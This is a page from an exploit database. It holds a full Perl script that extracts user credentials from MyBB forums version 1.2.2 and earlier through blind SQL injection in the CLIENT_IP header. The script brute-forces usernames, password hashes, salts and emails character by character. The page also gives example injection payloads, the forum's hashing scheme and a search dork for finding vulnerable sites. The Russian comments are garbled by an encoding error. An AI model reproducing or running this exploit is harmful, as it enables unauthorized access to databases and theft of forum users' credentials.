0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

MyBulletinBoard (MyBB) <= 1.2.2 (CLIENT-IP) SQL Injection Exploit

Author

Elekt

Risk

[

Security Risk Unsored

]

0day-ID

0day-ID-1746

Category

web applications

Date add

11-04-2007

Platform

unsorted

=================================================================
MyBulletinBoard (MyBB) <= 1.2.2 (CLIENT-IP) SQL Injection Exploit
=================================================================




#!/usr/bin/perl
###########################################################
#########################  LOGO  ##########################
###########################################################
#     Mybb <= 1.2.2 Remote SQL Injecton Exploit v.2.0     #
#                                                         #
#       [u]used:   SQL CLIENT_IP vulnerability            #
#       [!]need:   Mysql >= 4.1                           #
#       [w]work:   blind sql-inj                          #
#       [g]google: Powered By MyBB                        #
#                                                         #
###########################################################
#######################  Coments  #########################
###########################################################
#
# ÐžÐ¿Ð¸ÑÐ°Ð½Ð¸Ðµ:
# Ð Ð°Ð±Ð¾Ñ‚Ð° ÑÐºÑÐ¿Ð»Ð¾Ð¹Ñ‚Ð° Ð¾ÑÐ½Ð¾Ð²Ð°Ð½Ð° Ð½Ð° sql-Ð¸Ð½ÑŠÐµÐºÑ†Ð¸Ð¸ Ð² HTTP_CLIENT_IP.
# ÐÐµÐ°Ð²Ñ‚Ð¾Ñ€Ð¸Ð·Ð¾Ð²Ð°Ð½Ð½Ñ‹Ð¹ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»ÑŒ Ð¼Ð¾Ð¶ÐµÑ‚ Ð²Ñ‹Ð¿Ð¾Ð»Ð½Ð¸Ñ‚ÑŒ Ð¿Ñ€Ð¾Ð¸Ð·Ð²Ð¾Ð»ÑŒÐ½Ñ‹Ð¹ SQL-Ð·Ð°Ð¿Ñ€Ð¾Ñ Ð² Ð±Ð°Ð·Ñƒ.
#
# http://host.com/mybb/index.php
# MySQL error: 1064
# You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '">'' at line 3
# Query: DELETE FROM mybb_sessions WHERE ip=''">'
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# ÐÑ‚Ð¾ Ð½Ð¾Ð²Ð°Ñ Ð²ÐµÑ€ÑÐ¸Ñ ÑÐºÑÐ¿Ð»Ð¾Ð¹Ñ‚Ð°. 
# ÐœÐ½Ð¾Ð¹ Ð±Ñ‹Ð» Ð½Ð°Ð¹Ð´ÐµÐ½ ÑÐ¿Ð¾ÑÐ¾Ð± Ð¾Ñ‚ÐºÐ°Ð·Ð°Ñ‚ÑŒÑÑ Ð¾Ñ‚ Ð¸ÑÐ¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ð½Ð¸Ñ benchmark,
# Ñ‡Ñ‚Ð¾ Ð¿Ð¾Ð·Ð²Ð¾Ð»ÑÐµÑ‚ ÑƒÑÐºÐ¾Ñ€Ð¸Ñ‚ÑŒ Ñ€Ð°Ð±Ð¾Ñ‚Ñƒ ÑÐºÑÐ¿Ð»Ð¾Ð¹Ñ‚Ð°, Ð¿Ð¾Ð²Ñ‹ÑÐ¸Ñ‚ÑŒ Ð½Ð°Ð´ÐµÐ¶Ð½Ð¾ÑÑ‚ÑŒ Ð¿Ð¾Ð»ÑƒÑ‡ÐµÐ½Ð½Ñ‹Ñ… Ð´Ð°Ð½Ð½Ñ‹Ñ….
# 
# Ð Ð°Ð±Ð¾Ñ‚Ð° ÑÐºÑÐ¿Ð»Ð¾Ð¹Ñ‚Ð° Ð¾ÑÐ½Ð¾Ð²Ð°Ð½Ð° Ð½Ð° Ð¿Ñ€Ð¾Ð²Ð¾Ñ†Ð¸Ñ€Ð¾Ð²Ð°Ð½Ð¸Ð¸ "Subquery returns more than 1 row" Ð¾ÑˆÐ¸Ð±ÐºÐ¸,
# Ñ‡Ñ‚Ð¾ Ð¿Ð¾Ð·Ð²Ð¾Ð»ÑÐµÑ‚ Ð¿Ñ€Ð¾Ð¸Ð·Ð²ÐµÑÑ‚Ð¸ blind-sql-inj: 
# 
# mybb
# match: "Subquery returns more than 1 row"
# CLIENT_IP: 123' or 1=(select null from mybb_users where length(if(ascii(substring((select password from mybb_users where uid=1),1,1))>1,password,uid))<5)/*
# CLIENT_IP: 123' or 1=(select null from mybb_users where length(if(ascii(substring((select password from mybb_users where uid=1),1,1))>254,password,uid))<5)/*
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# 
# ÐŸÐ¾Ð»ÐµÐ·Ð½Ñ‹Ðµ Ñ‚Ð°Ð±Ð»Ð¸Ñ†Ñ‹ Ð¸ Ð¿Ð¾Ð»Ñ:
# mybb_1.2.1: mybb_users - uid,username,password,salt,email,loginkey,icq,aim,regip
# 
# ÐÐ»Ð³Ð¾Ñ€Ð¸Ñ‚Ð¼ Ð³ÐµÐ½ÐµÑ€Ð°Ñ†Ð¸Ð¸ Ð¿Ð°Ñ€Ð¾Ð»ÐµÐ¹ Ð² mybb:
# md5(md5($salt).md5($password))
# generate_salt{return random_str(8);}
# 
###########################################################
#########################  init  ###########################
###########################################################

use LWP::UserAgent; 
$sock = LWP::UserAgent->new();

$|=1;

&header();


###########################################################
#######################  Options  #########################
###########################################################

if (@ARGV < 2) {&info(); exit();}

$host = $ARGV[0]; # ÑÐµÑ€Ð²Ð°Ðº
$dir = $ARGV[1];  # Ð´Ð¸Ñ€Ð° Ñ Ñ„Ð¾Ñ€ÑƒÐ¼Ð¾Ð¼
$uid = 2;         # Ð°ÐºÐº Ð°Ð´Ð¼Ð¸Ð½Ð° Ð¿Ð¾ Ð´ÐµÑ„Ð°ÑƒÐ»Ñ‚Ñƒ
$uid = $ARGV[2] if $ARGV[2];

$debug = 0;            # Ñ€ÐµÐ¶Ð¸Ð¼ Ð¾Ñ‚Ð»Ð°Ð´ÐºÐ¸
$space = "char(58)";   # Ñ€Ð°Ð·Ð´ÐµÐ»Ð¸Ñ‚ÐµÐ»ÑŒ ÑÑ‚Ð¾Ð»Ð±Ñ†Ð¾Ð²
#$search = "password";  # Ñ‡Ñ‚Ð¾ Ð±Ñ€ÑƒÑ‚Ð¸Ð¼, ÑÐ¾Ð±ÑÑ‚Ð²ÐµÐ½Ð½Ð¾...
#$search = "concat(uid,$space,password,$space,salt)"; # uid:password:salt
$search = "concat(uid,$space,username,$space,password,$space,salt,$space,email)"; # uid:username:password:salt:email
$search = $ARGV[3] if $ARGV[3];

# $presetascii - Ð´Ð¸Ð°Ð¿Ð°Ð·Ð¾Ð½ ascii-ÐºÐ¾Ð´Ð¾Ð² Ð´Ð»Ñ Ð±Ñ€ÑƒÑ‚Ð° Ð²ÐµÑ€Ð¾ÑÑ‚Ð½Ñ‹Ñ… Ð´Ð°Ð½Ð½Ñ‹Ñ…
# $presetascii = "0123456789abcdef";
# $presetascii = "0123456789"
# $presetascii = "abcdefghijklmnopqrstuvwxyz"
# $presetascii = "0123456789abcdefghijklmnopqrstuvwxyz"
# $presetascii = "Ð°Ð±Ð²Ð³Ð´ÐµÑ‘Ð¶Ð·Ð¸Ð¹ÐºÐ»Ð¼Ð½Ð¾Ð¿Ñ€ÑÑ‚ÑƒÑ„Ñ…Ñ†Ñ‡ÑˆÑ‰ÑŠÑ‹ÑŒÑÑŽÑ");
# Ñ†Ð¸ÐºÐ», Ð´Ð»Ñ Ð¿Ñ€Ð¾ÑÑ‚Ð¾Ñ‚Ñ‹ Ð·Ð°Ð´Ð°Ñ‘Ñ‚ Ð²ÑÐµ ÑÐ¸Ð¼Ð²Ð¾Ð»Ñ‹ Ð´Ð»Ñ Ð¿ÐµÑ€ÐµÐ±Ð¾Ñ€Ð° 
$i=0;
while($i<=255){
$presetascii.=chr($i);$i++;
}

###########################################################
#########################  go!  ###########################
###########################################################


$time=localtime;
&log ("[i] Start time  $time\n");
&log ("[+] HOST \"$host\"\n");
&log ("[+] DIR  \"$dir\"\n");
&log ("[+] UID  \"$uid\"\n");
&log ("[+] Search  \"$search\"\n");

###########################################################
###### detecting vulnerability and searching prefix #######
###########################################################

# detecting vulnerability and searching prefix
&log ("[~] Testing forum vulnerabile... ");
$q = "";
$prefix=query($q,$host,$dir);
if($prefix ne "not_find"){&log ("Yes! Forum vulnerable!\n");sleep(1);&log ("[~] Searching prefix...");sleep(1);&log (" prefix find - \"$prefix\"\n"); }
else 
    {
     &log ("Sorry. Forum unvulnerable\n");
	 &footer();
     exit();
    }


###########################################################
#####################   brutforce   #######################
###########################################################

# brutforce
&log ("[~] Brutforce begin! it may take some time, plz, wait...\n");
$kol=1;
for ($control=0;$control==0;){
   &log("\n---------------- Simvol $kol ----------------\n\n") if $debug;
   $amin = 1;
   $amax = length($presetascii)-1;
   $n=0;

   # ÐµÑÐ»Ð¸ Ð´Ð¸Ð°Ð¿Ð°Ð·Ð¾Ð½ 4 Ð¸ Ð±Ð¾Ð»ÐµÐµ ÑÐ¸Ð¼Ð²Ð¾Ð»Ð¾Ð², Ð¿ÐµÑ€ÐµÐ¾Ð¿Ñ€ÐµÐ´ÐµÐ»ÑÐµÐ¼ Ð´Ð¸Ð°Ð¿Ð°Ð·Ð¾Ð½, ÑƒÐ¼ÐµÐ½ÑŒÑˆÐ°Ñ ÐµÐ³Ð¾ Ð² 2 Ñ€Ð°Ð·Ð°
   while (($amax-$amin)>=4){
        print ("-> Try ".ord(substr($presetascii,$amin,1))." .. ".ord(substr($presetascii,$amax,1))." -> ") if $debug;;
	#$q = "or 1=if((ascii(substring((select ".$search." from ".$prefix."users where uid='".$uid."'),".$kol.",1))>=".ord(substr($presetascii,int($amax-($amax-$amin)/2),1))."),1,benchmark(".$benchmark.",md5(char(114,115,116))))/*";
	$q = "or 1=(select null from ".$prefix."users where length(if((ascii(substring((select ".$search." from ".$prefix."users where uid='".$uid."'),".$kol.",1))>=".ord(substr($presetascii,int($amax-($amax-$amin)/2),1))."),password,uid))<5)/*";
        if (query($q,$host,$dir) eq "not_find") { 
          print ("Char>=".ord(substr($presetascii,int($amax-($amax-$amin)/2),1))."\n") if $debug;;
          $amin=int($amax-($amax-$amin)/2); }
        else { 
          print ("Char<".ord(substr($presetascii,int($amax-($amax-$amin)/2),1))."\n") if $debug;;
          $amax=int($amax-($amax-$amin)/2); };
   }
   
   # ÐµÑÐ»Ð¸ Ð´Ð¸Ð°Ð¿Ð°Ð·Ð¾Ð½ Ð¼ÐµÐ½ÐµÐµ 4-Ñ… ÑÐ¸Ð¼Ð²Ð¾Ð»Ð¾Ð², Ñ‚Ð¾ Ð¿ÐµÑ€ÐµÑ…Ð¾Ð´Ð¸Ð¼ Ðº Ð¿ÐµÑ€ÐµÐ±Ð¾Ñ€Ñƒ
   while ($amin<=$amax) {
     print ("-> Try ".ord(substr($presetascii,$amin,1))." ->") if $debug;;
     # Ð¿Ñ€Ð¾Ð²ÐµÑ€ÑÐµÐ¼ Ð¾Ñ‚Ð²ÐµÑ‚ ÑÐºÑ€Ð¸Ð¿Ñ‚Ð°, ÐµÑÐ»Ð¸ Ð¾Ñ‚Ð²ÐµÑ‚ Ð¿Ð¾Ð»Ð¾Ð¶Ð¸Ñ‚ÐµÐ»ÑŒÐ½Ñ‹Ð¹ Ñ‚Ð¾ Ð²Ñ‹Ð²Ð¾Ð´Ð¸Ð¼ ÑÐ¸Ð¼Ð²Ð¾Ð» Ð¸ Ð¸Ñ‰ÐµÐ¼ ÑÐ»ÐµÐ´ÑƒÑŽÑ‰Ð¸Ð¹ ÑÐ¸Ð¼Ð²Ð¾Ð» Ð² ÑÐ»Ð¾Ð²Ðµ, ÐµÑÐ»Ð¸ Ð½Ðµ Ð¾Ð¿Ñ€ÐµÐ´ÐµÐ»ÑÐµÐ¼ ÑÐ¸Ð¼Ð²Ð¾Ð» - Ð²Ñ‹Ñ…Ð¾Ð´.
	#$q = "or 1=if((ascii(substring((select ".$search." from ".$prefix."users where uid='".$uid."'),".$kol.",1))=".ord(substr($presetascii,$amin,1))."),1,benchmark(".$benchmark.",md5(char(114,115,116))))/*";
	$q = "or 1=(select null from ".$prefix."users where length(if((ascii(substring((select ".$search." from ".$prefix."users where uid='".$uid."'),".$kol.",1))=".ord(substr($presetascii,$amin,1))."),password,uid))<5)/*";
     if (query($q,$host,$dir) eq "not_find") {
          &log (" FOUND!\n-> Ascii: ".ord(substr($presetascii,$amin,1))."\n-> Char: \"".substr($presetascii,$amin,1)."\"\n") if $debug;; 
          &log ("[$kol] Find - ascii:\"".ord(substr($presetascii,$amin,1))."\", char:\"".substr($presetascii,$amin,1)."\"\n") if !$debug;
          $rezultat_char = $rezultat_char.substr($presetascii,$amin,1); 
          $rezultat_ascii = $rezultat_ascii.ord(substr($presetascii,$amin,1)).","; 
          $amin=$amax+1;$control=1;}
        else { print (" NO =(\n") if $debug; $amin=$amin+1; };
   }
   if ($control==0) { 
     if($amin!=5){$rezultat_char = $rezultat_char."?";$rezultat_ascii = $rezultat_ascii."?,";
                  &log ("[$kol] Error! not found =( $amin\n") if !$debug;
                  &log (" Error! not found =(\n") if $debug;
     }else{$control=1;}
   }else {$control=0;}
   $kol++;
}

print ("\n[!] Yyyy-a-a-a-h-h-uuu!!!\n");
&log ("\n[*] Char: $rezultat_char\n[*] Ascii: $rezultat_ascii\n");
$time=localtime;
&log ("\n[i] Finish time  $time\n\n");


&footer();
exit();

###########################################################
########################  log   ##########################
###########################################################
# Ð»Ð¾Ð³
sub log($)
    {
     open(RES,">>".$host."_log.txt") || die "[-] Cannot open log file!"; ## ÐžÑ‚ÐºÑ€Ñ‹Ð²Ð°ÐµÐ¼ Ð»Ð¾Ð³ Ð´Ð»Ñ Ð´Ð¾Ð·Ð°Ð¿Ð¸ÑÐ¸
     print ("$_[0]");
     print RES ("$_[0]");
     close(RES);
    }

###########################################################
######################## footer  ##########################
###########################################################
# ÑÐ¿Ð¸Ð»Ð¾Ð³
sub footer()
    {
     print ("[G] Greets: Elekt (antichat.ru), 1dt.w0lf (rst/ghc)\n");
     print ("[L] Visit : www.inj3ct0r.com\n");
    }


###########################################################
######################## header  ##########################
###########################################################
# Ñ…Ð¸Ð´ÐµÑ€
sub header()
{
print q(
=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=
+     Mybb <= 1.2.2 Remote SQL Injecton Exploit v.2.0     +
+                                                         +
+       [i]used:   SQL CLIENT_IP vulnerability            +
+       [!]need:   Mysql >= 4.1                           +
+       [w]work:   blind sql-inj                          +
+       [i]google: Powered By MyBB                        +
+                                                         +
+               coded by Elekt (antichat.ru)              +
=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_+
);
}


###########################################################
########################  info   ##########################
###########################################################
# Ð¸Ð½Ñ„Ð¾
sub info()
{
 print q(
[i] Usage: 
 perl mybb122exp.pl [host] [/dir/] [uid] [search]
*-required
  *[host] - target host without http://
  *[/dir/] - installed forums dir
   [uid] - user uid (default=2)
   [search] - data (uid:username:password:salt:email)
	   
[E] Example: perl mybb122exp.pl host.com /forum/ 1 password

[i] mybb: md5(md5($salt).md5($password))

 );
}

###########################################################
#######################  sender   #########################
###########################################################
# Ð¿Ñ€Ð¾Ñ†ÐµÐ´ÑƒÑ€Ð° Ð¿Ñ€Ð¸ÐµÐ¼Ð°\Ð¿Ð¾ÑÑ‹Ð»ÐºÐ¸ Ð´Ð°Ð½Ð½Ñ‹Ñ…
sub query()
    {
     #&log ("\n\n$q\n\n") if $debug;
     my($q,$host,$dir) = @_;
     $res = $sock->get("http://".$host.$dir."index.php",'USER_AGENT'=>'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)','CLIENT_IP'=>"' ".$q); 
     if($res->is_success)
        {
             if($res->as_string =~ /FROM (.*)sessions/) { return $1; } else {return "not_find";}
        }
     else{&log ("\n[!] Connection to $host FAILED! EXIT\n"); exit;}
    }



#  0day.today [2024-12-23]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

MyBulletinBoard (MyBB) <= 1.2.2 (CLIENT-IP) SQL Injection Exploit

Report Error

Report Error